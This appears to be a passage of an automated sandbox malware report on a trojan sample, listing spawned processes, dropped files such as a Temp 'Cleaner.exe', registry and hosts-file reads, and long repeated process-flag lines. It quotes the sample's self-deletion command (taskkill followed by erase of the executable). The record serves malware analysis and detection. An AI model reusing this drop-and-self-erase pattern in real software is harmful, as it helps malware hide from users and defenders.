                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 700
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 724
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 760
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 768
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 848
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 840
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1032
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1292
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1552
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FMJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0Jump to behavior
                  Source: classification engineClassification label: mal88.troj.winEXE@21/51@1/5
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3196
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4744:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4392:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: ^\C:\car.pdb source: file.exe
                  Source: Binary string: C:\car.pdb source: file.exe
                  Source: Cleaner.exe.0.drStatic PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.920922021912582
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.920922021912582
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
